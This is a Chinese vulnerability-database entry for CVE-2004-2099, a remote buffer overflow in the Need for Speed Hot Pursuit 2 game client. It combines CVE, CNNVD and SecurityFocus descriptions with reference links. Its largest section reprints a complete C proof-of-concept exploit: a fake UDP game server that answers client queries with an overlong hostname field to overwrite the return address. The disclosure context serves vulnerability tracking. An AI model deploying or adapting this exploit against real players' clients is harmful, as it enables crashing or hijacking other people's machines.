CVE-2004-2099
CVSS5.1
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:06:09
NMCOES    

[原文]Buffer overflow in Need for Speed Hot Pursuit 2.0 client (NFSHP2), version 242 and earlier, allows remote attackers (servers) to execute arbitrary code via long (1) gamename, (2) gamever, (3) hostname, (4) gametype, (5) mapname or (6) gamemode commands.


[CNNVD]EA Black Box Need For Speed Hot Pursuit 2游戏客户端远程缓冲区溢出漏洞(CNNVD-200412-710)

        
        Need for Speed Hot Pursuit 2 (NFSHP2)是一款赛车游戏。
        Need for Speed Hot Pursuit 2客户端对服务器应答的信息缺少正确缓冲区边界检查,远程攻击者可以利用这个漏洞对客户端进行缓冲区溢出攻击,可能以游戏进程权限在系统上执行任意指令。
        客户端通过网络进行游戏时,会对游戏服务端进行查询,由于对服务器应答的部分参数缺少充分边界检查,伪造服务器应答,提交超长的"mapname"参数值,可破坏内存信息,造成缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2099
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2099
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-710
(官方数据源) CNNVD

- 其它链接及资源

http://aluigi.altervista.org/adv/nfshp2cbof-adv.txt
(UNKNOWN)  MISC  http://aluigi.altervista.org/adv/nfshp2cbof-adv.txt
http://marc.info/?l=bugtraq&m=107479094508691&w=2
(UNKNOWN)  BUGTRAQ  20040122 Need for Speed Hot pursuit 2 <= 242 client's buffer overflow
http://www.securityfocus.com/bid/9473
(UNKNOWN)  BID  9473
http://xforce.iss.net/xforce/xfdb/14909
(UNKNOWN)  XF  hotpursuit2-bo(14909)

- 漏洞信息

EA Black Box Need For Speed Hot Pursuit 2游戏客户端远程缓冲区溢出漏洞
中危 边界条件错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Need for Speed Hot Pursuit 2 (NFSHP2)是一款赛车游戏。
        Need for Speed Hot Pursuit 2客户端对服务器应答的信息缺少正确缓冲区边界检查,远程攻击者可以利用这个漏洞对客户端进行缓冲区溢出攻击,可能以游戏进程权限在系统上执行任意指令。
        客户端通过网络进行游戏时,会对游戏服务端进行查询,由于对服务器应答的部分参数缺少充分边界检查,伪造服务器应答,提交超长的"mapname"参数值,可破坏内存信息,造成缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Electronic Arts
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.eagames.com/pccd/nfshp2/home.jsp

- 漏洞信息 (147)

Need for Speed 2 Remote Client Buffer Overflow Exploit (EDBID:147)
windows dos
2004-01-23 Verified
0 Luigi Auriemma
N/A [点击下载]
/*

Need for Speed 2 Remote Client Buffer Overflow Exploit - 23.01.2004

by Luigi Auriemma

UNIX & WIN VERSION
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif






#define VER "0.1"
#define BUFFSZ 2048
#define PORT 61220
#define RETADD 0xdeadc0de
#define RETOFF 540
#define NFS240 "18022640"
#define NFS242 "18088178"
#define NFSOFF 669 /* referred to pck[] nver, don't change it */






void std_err(void);






int main(int argc, char *argv[]) {
int sd,
err,
on = 1,
psz;
struct sockaddr_in peer;
u_char *buff,
pck[] =
"\\gamename\\nfs6"
"\\gamever\\240" // it is useless
"\\hostname\\"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaa"
"0000" // return address
"\\hostport\\8511"
"\\mapname\\Fall Winds"
"\\gametype\\Single Race"
"\\numplayers\\1"
"\\maxplayers\\8"
"\\gamemode\\openplaying"
"\\pbmd\\0"
"\\password\\0"
"\\nver\\" NFS240
"\\ctid\\6"
"\\res\\38"
"\\dir\\0"
"\\laps\\2"
"\\ded\\0"
"\\final\\"
"\\queryid\\2.1";


setbuf(stdout, NULL);

fputs("\n"
"Need for Speed Hot pursuit 2 <= 242 client's buffer overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 2) {
printf("\nUsage: %s <version>\n"
"\n"
"Version:\n"
"240 = this is the default (1.0) and more diffused version\n"
"242 = the latest patched version, rarely used by players\n"
"\n", argv[0]);
exit(1);
}


if(!memcmp(argv[1], "240", 3)) {
printf("Selected version 240 (nver %s)\n", NFS240);
} else if(!memcmp(argv[1], "242", 3)) {
printf("Selected version 242 (nver %s)\n", NFS242);
memcpy(pck + NFSOFF, NFS242, sizeof(NFS242) - 1);
} else {
printf("\nError: you must choose between 240 and 242 only\n");
exit(1);
}


#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

peer.sin_addr.s_addr = INADDR_ANY;
peer.sin_port = htons(PORT);
peer.sin_family = AF_INET;
psz = sizeof(peer);

printf("\nBinding UDP port %u\n", PORT);

err = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on));
if(err < 0) std_err();
err = bind(sd, (struct sockaddr *)&peer, psz);
if(err < 0) std_err();

printf("The return address will be overwritten with 0x%08x\n", RETADD);
*(u_long *)(pck + RETOFF) = RETADD;

buff = malloc(BUFFSZ);
if(!buff) std_err();

fputs("Clients:\n", stdout);
while(1) {
err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
if(err < 0) std_err();

printf("%16s:%hu -> ",
inet_ntoa(peer.sin_addr), htons(peer.sin_port));

err = sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, psz);
if(err < 0) std_err();
fputs("BOOM\n", stdout);
}

close(sd);
return(0);
}


#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif



/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/

#include <string.h>
#include <errno.h>


void std_err(void) {
char *error;

switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\nError: %s\n", error);
exit(1);
}


// milw0rm.com [2004-01-23]
		

- 漏洞信息

3693
Need for Speed Client Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-01-23 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

EA Black Box Need For Speed Hot Pursuit 2 Game Client Remote Buffer Overflow Vulnerability
Boundary Condition Error 9473
Yes No
2004-01-22 12:00:00 2009-07-12 02:06:00
Discovery of this vulnerability has been credited to Luigi Auriemma <aluigi@altervista.org>.

- 受影响的程序版本

EA Black Box Need for Speed Hot Pursuit 2 242.0

- 漏洞讨论

Electronic Arts Black Box Need for Speed Hot Pursuit 2 game client has been reported prone to a remotely exploitable buffer overflow condition.

The issue presents itself in the client network connection routines, used by the client to negotiate a connection to a Need for Speed Hot Pursuit 2 game server. Due to a lack of sufficient bounds checking performed on certain parameters a malicious server may potentially corrupt sensitive process memory in the affected game client and ultimately execute arbitrary code with the privileges of the user who invoked the game.

- 漏洞利用

The following denial-of-service proof of concept has been supplied:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站